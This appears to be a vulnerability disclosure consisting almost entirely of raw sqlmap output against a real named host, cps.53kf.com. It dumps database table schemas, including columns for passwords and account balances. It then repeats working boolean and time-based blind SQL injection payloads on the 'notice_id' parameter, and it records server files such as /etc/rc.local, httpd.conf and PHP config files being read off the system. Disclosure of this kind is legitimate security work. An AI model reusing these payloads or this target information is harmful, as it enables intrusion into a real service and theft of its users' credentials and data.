| Column | Type |
±---------±--------------------+
| agent_id | int(11) |
| balance | float(7,2) unsigned |
| id | int(10) unsigned |
| io_time | datetime |
| io_type | int(10) unsigned |
| money | float unsigned |
| orderid | varchar(20) |
| reason | text |
±---------±--------------------+
Database: v5
Table: v5_company_bill
[13 columns]
±------------±-----------------+
| Column | Type |
±------------±-----------------+
| company_id | int(20) |
| date | datetime |
| id | int(20) unsigned |
| ip | varchar(50) |
| istalk | tinyint(1) |
| money | float(7,2) |
| old_comid | bigint(20) |
| orderid | varchar(20) |
| pay_way | varchar(20) |
| person_name | varchar(100) |
| remark | text |
| src | varchar(20) |
| type | tinyint(2) |
±------------±-----------------+
Database: v5
Table: gggj_ad
[15 columns]
±------------±------------------+
| Column | Type |
±------------±------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | datetime |
| audit | enum(‘Y’,‘N’,‘X’) |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(20) |
| money_type | tinyint(2) |
| order_by | varchar(5) |
| show_type | varchar(1) |
| start_time | date |
±------------±------------------+
Database: v5
Table: web_user_url
[8 columns]
±--------------------±-------------+
| Column | Type |
±--------------------±-------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| id | int(10) |
| is_first | tinyint(3) |
| pr | tinyint(2) |
| url | varchar(256) |
| user_name | varchar(20) |
| web_ad_out_links_id | int(10) |
±--------------------±-------------+
Database: v5
Table: ad_count
[6 columns]
±----------±------------+
| Column | Type |
±----------±------------+
| ad_date | date |
| ad_id | int(11) |
| ad_ip_num | int(10) |
| ad_num | int(10) |
| ad_type | varchar(50) |
| id | int(11) |
±----------±------------+
Database: v5
Table: v5_worker
[6 columns]
±-----------±-------------+
| Column | Type |
±-----------±-------------+
| company_id | int(11) |
| id | int(11) |
| is_admin | tinyint(4) |
| name | varchar(100) |
| passwd | varchar(40) |
| worker_id | varchar(20) |
±-----------±-------------+
Database: v5
Table: gggj_ad_old
[13 columns]
±------------±------------------+
| Column | Type |
±------------±------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | date |
| audit | enum(‘Y’,‘N’,‘X’) |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(11) |
| money_type | tinyint(2) |
| start_time | date |
±------------±------------------+
Database: v5
Table: v5_agent_oper
[30 columns]
±---------------±--------------------+
| Column | Type |
±---------------±--------------------+
| active_money | float(10,2) |
| addr | varchar(150) |
| city | varchar(20) |
| city_center | tinyint(3) unsigned |
| city_discount | float unsigned |
| city_name | varchar(30) |
| discount | float unsigned |
| email | varchar(100) |
| fix_money | float(10,2) |
| id | int(10) unsigned |
| is_zongdai | tinyint(3) unsigned |
| kf_name | int(8) |
| money | float(10,2) |
| msg | tinyint(3) unsigned |
| name | varchar(50) |
| new_add_money | float(10,2) |
| new_add_month | varchar(7) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| pass | tinyint(3) unsigned |
| phone | varchar(50) |
| receipt_money | float(10,2) |
| reg_date | datetime |
| see_agent_user | tinyint(3) |
| style_lock | tinyint(3) unsigned |
| tm | varchar(50) |
| type | tinyint(3) unsigned |
| zdygg | tinyint(3) unsigned |
| zdylogo | tinyint(3) unsigned |
| zongdai_id | int(10) unsigned |
±---------------±--------------------+
Database: v5
Table: gggj_adstat
[6 columns]
±------------±-------------+
| Column | Type |
±------------±-------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
±------------±-------------+
Database: v5
Table: v5_company_talk_log
[5 columns]
±-----------±-------------+
| Column | Type |
±-----------±-------------+
| company_id | int(10) |
| id | int(10) |
| talk_date | datetime |
| talk_ip | varchar(15) |
| talk_url | varchar(100) |
±-----------±-------------+
Database: v5
Table: gggj_accountHistory
[6 columns]
±------------±------------+
| Column | Type |
±------------±------------+
| account | varchar(40) |
| add_person | varchar(11) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| moneNum | char(10) |
±------------±------------+
Database: v5
Table: gggj_account
[8 columns]
±---------------±--------------+
| Column | Type |
±---------------±--------------+
| account | varchar(50) |
| account_from | varchar(20) |
| account_person | varchar(11) |
| account_type | char(10) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| is_select | enum(‘Y’,‘N’) |
±---------------±--------------+
Database: v5
Table: out_links
[7 columns]
±------------±--------------+
| Column | Type |
±------------±--------------+
| ad_user | varchar(25) |
| add_time | datetime |
| anchor_text | varchar(128) |
| id | int(10) |
| pr | tinyint(2) |
| web_type | enum(‘0’,‘1’) |
| web_url | varchar(50) |
±------------±--------------+
Database: v5
Table: user_infor
[17 columns]
±-------------±-----------------+
| Column | Type |
±-------------±-----------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| com_name | varchar(128) |
| connect | varchar(40) |
| email | varchar(50) |
| gm_sum | int(10) |
| id | int(20) unsigned |
| money | int(10) |
| password | varchar(50) |
| phone | varchar(20) |
| pr | tinyint(2) |
| qq | varchar(20) |
| reg_sum | int(10) |
| type | varchar(2) |
| user_level | tinyint(2) |
| user_name | varchar(20) |
| website | varchar(50) |
±-------------±-----------------+
Database: v5
Table: cps_commission_log
[8 columns]
±---------------±-----------------+
| Column | Type |
±---------------±-----------------+
| add_time | datetime |
| company_id | int(10) unsigned |
| cps_account | varchar(20) |
| domain_name | varchar(20) |
| id | int(20) |
| money | decimal(10,2) |
| recharge_money | decimal(10,2) |
| remark | varchar(150) |
±---------------±-----------------+
Database: v5
Table: user_infor_xx
[4 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| add_date | datetime |
| id | int(20) |
| user_id | int(20) |
| xx_name | varchar(20) |
±---------±------------+
Database: v5
Table: ad_show
[4 columns]
±--------±--------+
| Column | Type |
±--------±--------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
±--------±--------+
Database: v5
Table: web_ad_out_links
[11 columns]
±----------------±------------------+
| Column | Type |
±----------------±------------------+
| add_time | datetime |
| delete_by | enum(‘2’,‘1’,‘0’) |
| delete_time | datetime |
| end_time | datetime |
| id | int(10) |
| money_clearing | datetime |
| out_links_id | varchar(10) |
| start_time | datetime |
| status | enum(‘0’,‘1’,‘2’) |
| web_user | varchar(25) |
| web_user_url_id | int(10) |
±----------------±------------------+
Database: v5
Table: sendemail_record
[10 columns]
±---------±-----------------------------+
| Column | Type |
±---------±-----------------------------+
| addtime | int(11) |
| content | varchar(225) |
| endtime | int(11) |
| mail_id | int(11) |
| receiver | varchar(225) |
| report | text |
| sendtime | int(11) |
| status | enum(‘wait’,‘sending’,‘end’) |
| title | varchar(225) |
| type | enum(‘1’,‘2’,‘3’) |
±---------±-----------------------------+
Database: v5
Table: mailqueue
[9 columns]
±---------±-------------+
| Column | Type |
±---------±-------------+
| charset | char(4) |
| content | mediumtext |
| from1 | varchar(100) |
| fromname | varchar(255) |
| id | int(11) |
| reply | varchar(100) |
| status | tinyint(4) |
| subject | varchar(255) |
| to1 | varchar(255) |
±---------±-------------+
Database: v5
Table: gggj_master_user
[13 columns]
±---------±--------------+
| Column | Type |
±---------±--------------+
| com_name | varchar(100) |
| gg_type | varchar(20) |
| id | int(50) |
| is_proxy | enum(‘N’,‘Y’) |
| mail | varchar(20) |
| mobile | varchar(20) |
| name | varchar(10) |
| pass | char(50) |
| person | varchar(20) |
| phone | varchar(20) |
| remark | text |
| type | char(10) |
| url | varchar(100) |
±---------±--------------+
Database: v5
Table: gggj_config
[3 columns]
±-------------±------------+
| Column | Type |
±-------------±------------+
| config_id | varchar(20) |
| config_value | text |
| domain_name | varchar(50) |
±-------------±------------+
Database: v5
Table: id_record
[3 columns]
±----------±---------+
| Column | Type |
±----------±---------+
| id | int(20) |
| last_date | datetime |
| last_id | int(10) |
±----------±---------+
Database: v5
Table: v5_company_config
[3 columns]
±-------------±------------+
| Column | Type |
±-------------±------------+
| company_id | int(11) |
| config_id | varchar(20) |
| config_value | text |
±-------------±------------+
Database: v5
Table: conf_ip1
[6 columns]
±---------±--------------------+
| Column | Type |
±---------±--------------------+
| area | char(30) |
| city | char(30) |
| city_cn | char(30) |
| end_ip | bigint(20) unsigned |
| isp | char(30) |
| start_ip | bigint(20) unsigned |
±---------±--------------------+
Database: v5
Table: gggj_require
[10 columns]
±-------------±--------------+
| Column | Type |
±-------------±--------------+
| add_date | datetime |
| add_fujian | varchar(255) |
| add_solution | text |
| add_user | int(10) |
| audit | enum(‘Y’,‘N’) |
| audit_day | datetime |
| content | text |
| id | int(10) |
| master_name | varchar(25) |
| title | varchar(50) |
±-------------±--------------+
Database: v5
Table: official_adstat
[6 columns]
±------------±-------------+
| Column | Type |
±------------±-------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
±------------±-------------+
Database: v5
Table: kf_tuo
[8 columns]
±----------±-------------+
| Column | Type |
±----------±-------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| id | int(10) |
| user_id | int(10) |
±----------±-------------+
Database: v5
Table: ad_show_js
[4 columns]
±--------±--------+
| Column | Type |
±--------±--------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
±--------±--------+
Database: v5
Table: cps_user
[13 columns]
±------------------±-------------+
| Column | Type |
±------------------±-------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
±------------------±-------------+
Database: v5
Table: cps_user_account
[9 columns]
±------------------±-----------------+
| Column | Type |
±------------------±-----------------+
| add_time | datetime |
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| cust_id | varchar(20) |
| exact_io_type | int(10) unsigned |
| id | int(20) |
| io_remark | text |
| io_type | tinyint(2) |
| money | float(10,2) |
±------------------±-----------------+
Database: v5
Table: gggj_user_config
[4 columns]
±------------±------------+
| Column | Type |
±------------±------------+
| ad_id | int(11) |
| ad_order | int(4) |
| ad_pos | int(2) |
| domain_name | varchar(50) |
±------------±------------+
Database: v5
Table: gggj_master_type
[2 columns]
±--------±------------+
| Column | Type |
±--------±------------+
| gg_type | varchar(10) |
| id | int(10) |
±--------±------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/etc/rc.local file saved to: ‘C:\Python27\sqlmap\output\cps.53kf.com\files_etc_rc.local’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/usr/local/apache2/conf/httpd.conf file saved to: ‘C:\Python27\sqlmap\output\cps.53kf.com\files_usr_local_apache2_conf_httpd.conf’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/adv/www/cps/www/union_notice.php file saved to: ‘C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_cps_www_union_notice.php’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/adv/www/cps/www/include/global.php–threads=10 file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/adv/www/cps/www/include/global.php file saved to: ‘C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_cps_www_include_global.php’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/adv/www/index.php file saved to: ‘C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_index.php’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/adv/www/cps/www/config/cps_config.php file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP

漏洞证明:

<img src=“https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png” alt width=“600”>

<img src=“https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png” alt width=“600”>

JSON